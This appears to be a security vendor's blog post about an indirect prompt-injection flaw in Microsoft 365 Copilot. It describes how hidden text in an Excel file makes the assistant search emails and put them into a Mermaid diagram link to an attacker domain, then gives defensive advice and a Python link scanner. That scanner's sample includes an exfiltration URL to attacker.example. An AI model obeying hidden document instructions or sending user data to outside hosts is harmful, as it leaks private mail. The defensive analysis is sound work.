A newly discovered vulnerability in Microsoft 365 Copilot allows attackers to extract sensitive tenant data, such as recent emails, via an indirect prompt injection attack embedded within everyday Office documents. This incident highlights the growing complexity of securing AI-powered systems and the urgent need to treat them like any other enterprise attack surface.
How the Attack Works
- Attackers embed hidden instructions in an Office spreadsheet, commonly an Excel file, using white text or diagrams. The victim asks the assistant to “summarize this document,” unknowingly triggering the malicious logic.
- The hidden instructions instruct Copilot to invoke email search tools, retrieve sensitive content, and embed it in a rendered Mermaid diagram with a hyperlink pointing to an attacker-controlled domain.
- When the user clicks the link (which appears benign), the stolen data is transmitted to the attacker’s server. Because the user action looks normal and the AI assistant did the work, the exfiltration remains largely invisible.
- Microsoft validated the issue and issued a patch in September 2025 to remove interactive hyperlinks from diagram renderings and harden prompt interpretation.
Why This Matters for Enterprises
AI assistants like Copilot are increasingly embedded in productivity workflows, meaning a compromise can bypass traditional safeguards. Here’s why this vulnerability matters across sectors:
- Data exfiltration without malware: The exploit relies on no malware payload or code execution; it misuses the assistant's own natural-language and tool-calling features.
- Trusted context abuse: The victim’s own request triggers the exfiltration, making it difficult to detect as malicious.
- Broad industry exposure: Organizations in industries handling sensitive information—finance, healthcare, retail, manufacturing, government—are especially vulnerable. The attacker’s ability to pull emails or document content undermines both confidentiality and compliance.
- Expanding AI attack surface: As AI tools become deeply integrated, vulnerabilities like this become new high-stakes failure points alongside networks and endpoints.
Recommended Actions for Organizations
- Patch immediately – Ensure Copilot and related AI integrations are updated with the latest security fixes.
- Restrict AI document ingestion – Limit which documents the AI assistant can access and apply strict scanning of embedded metadata, diagrams, or hidden text.
- Monitor exfiltration channels – Track outgoing links generated by AI assistants, and alert on unusual redirect patterns or external requests triggered via diagrams or hyperlinks.
- Enforce strict MFA and least privilege – Especially for document-sharing, AI callbacks, and productivity tools that access sensitive data.
- Audit AI assistant usage – Review logs of assistant-driven actions, track document access context, and investigate any anomalies where AI was used for data-heavy requests.
- Train employees on AI risks – Update security awareness programs to include risks from AI assistants, hidden prompts, and malicious document formats.
- Treat AI as part of the attack surface – Incorporate AI assistant governance into your threat model and incident response planning.
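One way to implement the link monitoring recommended above, for the Mermaid-diagram exfiltration path described earlier, as an added example that is not code from the original post or from Microsoft: it pulls hyperlinks out of Mermaid blocks in an assistant response and flags links to hosts outside an allow-list or carrying oversized or encoded payloads. The allow-list, thresholds and sample response are constructed assumptions.

```python
import re
from urllib.parse import urlparse

FENCE = "`" * 3  # built this way so the sample cannot close the surrounding fence

# Assumption: hosts an assistant is allowed to link to (constructed allow-list).
ALLOWED_DOMAINS = {"contoso.sharepoint.com", "outlook.office.com"}
MAX_PAYLOAD_LEN = 100  # query+fragment longer than this is suspicious (assumed threshold)

MERMAID_BLOCK = re.compile(FENCE + r"mermaid\s*(.*?)" + FENCE, re.S)
URL_RE = re.compile(r"""https?://[^\s"')]+""")

def extract_mermaid_links(text):
    """Collect every URL that appears inside a mermaid code block."""
    links = []
    for block in MERMAID_BLOCK.findall(text):
        links.extend(URL_RE.findall(block))
    return sorted(set(links))

def assess_link(url, allowed=ALLOWED_DOMAINS):
    """Return the reasons a diagram hyperlink looks like an exfiltration channel."""
    parts = urlparse(url)
    host = parts.hostname or ""
    payload = parts.query + parts.fragment
    reasons = []
    if host not in allowed:
        reasons.append(f"external host {host}")
    if len(payload) > MAX_PAYLOAD_LEN:
        reasons.append(f"oversized query/fragment ({len(payload)} chars)")
    if re.search(r"[A-Za-z0-9+/=%]{80,}", payload):
        reasons.append("long encoded blob in URL")
    return reasons

def scan_assistant_output(text):
    """Map each suspicious mermaid link in an assistant response to its reasons."""
    findings = {}
    for url in extract_mermaid_links(text):
        reasons = assess_link(url)
        if reasons:
            findings[url] = reasons
    return findings

# Constructed sample response: one benign link, one link carrying a 120-char
# stand-in for encoded mailbox content, pointed at an outside host.
SAMPLE_OUTPUT = (
    "Summary of the Q3 spreadsheet:\n" + FENCE + "mermaid\n"
    "graph TD\n"
    "  A[Q3 Budget] --> B[Approved]\n"
    '  click B "https://contoso.sharepoint.com/sites/finance/Q3" "Open"\n'
    '  click A "https://attacker.example/c?d=' + "A" * 120 + '" "Details"\n'
    + FENCE + "\n"
)

if __name__ == "__main__":
    for url, reasons in scan_assistant_output(SAMPLE_OUTPUT).items():
        print(url[:60], "->", "; ".join(reasons))
```

In production the same check would run over assistant responses before rendering, so a flagged link is stripped or alerted on before a user can click it.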
Conclusion
This Copilot prompt injection vulnerability underscores a pivotal shift: attackers are targeting AI systems’ logic and workflows rather than just endpoints or networks. For organizations, the takeaway is clear—AI assistants are neither benign nor peripheral. They handle sensitive data, make decisions, and now emerge as worthy adversarial targets. Securing them demands the same rigor applied to endpoints, networks, and applications.
About COE Security
COE Security partners with organizations in financial services, healthcare, retail, manufacturing, and government to secure AI-powered systems and ensure compliance. Our offerings include:
- AI-enhanced threat detection and real-time monitoring
- Data governance aligned with GDPR, HIPAA, and PCI DSS
- Secure model validation to guard against adversarial attacks
- Customized training to embed AI security best practices
- Penetration Testing (Mobile, Web, AI, Product, IoT, Network & Cloud)
- Secure Software Development Consulting (SSDLC)
- Customized CyberSecurity Services
In response to threats like prompt injection attacks on AI assistants, we also provide AI risk-assessment services, prompt-governance frameworks, behavioral monitoring of AI workflows, and document-ingestion hardening for RAG systems.
Follow COE Security on LinkedIn for ongoing insights into safe, compliant AI adoption and to stay updated and cyber safe.